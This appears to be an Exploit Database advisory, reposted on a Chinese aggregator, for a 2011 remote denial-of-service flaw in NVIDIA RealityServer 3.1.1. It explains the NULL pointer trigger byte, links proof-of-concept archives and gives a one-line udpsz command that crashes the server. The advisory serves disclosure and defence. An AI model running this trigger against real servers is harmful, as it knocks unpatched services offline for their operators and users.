RealityServer Web Services RTMP Server 3.1.1 build 144525.5 – Null Pointer Dereference Denial of Service

• Exploit Database
• 16 阅读

• 作者： Luigi Auriemma
  日期： 2011-06-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35895/

• source: https://www.securityfocus.com/bid/48476/info
  
  RealityServer Web Services is prone to a remote denial-of-service vulnerability caused by a NULL pointer dereference.
  
  Attackers can exploit this issue to cause the server to dereference an invalid memory location, resulting in a denial-of-service condition. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed.
  
  RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected. 
  
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip
  
  
  
  
  #######################################################################
  
   Luigi Auriemma
  
  Application:NVIDIA RealityServer
  http://www.realityserver.com/products/realityserver.html
  http://www.nvidia.com/object/realityserver.html
  Versions: <= 3.1.1 build 144525.5057
  Platforms:Windows and Linux
  Bug:NULL pointer
  Exploitation: remote, versus server
  Date: 27 Jun 2011 (found and reported on my forum 04 Dec 2010)
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bug
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's website:
  "The RealityServer� platform is a powerful combination of NVIDIA�
  Tesla� GPUs and 3D web services software that delivers interactive,
  photorealistic applications over the web, enabling product designers,
  architects and consumers to easily visualize 3D scenes with remarkable
  realism."
  
  
  #######################################################################
  
  ======
  2) Bug
  ======
  
  
  If the byte at offset 0xc01 of the packet is >= 0x80 there will be a
  NULL pointer dereference.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  
  udpsz -C 03 -b 0xff -T SERVER 1935 0xc02
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################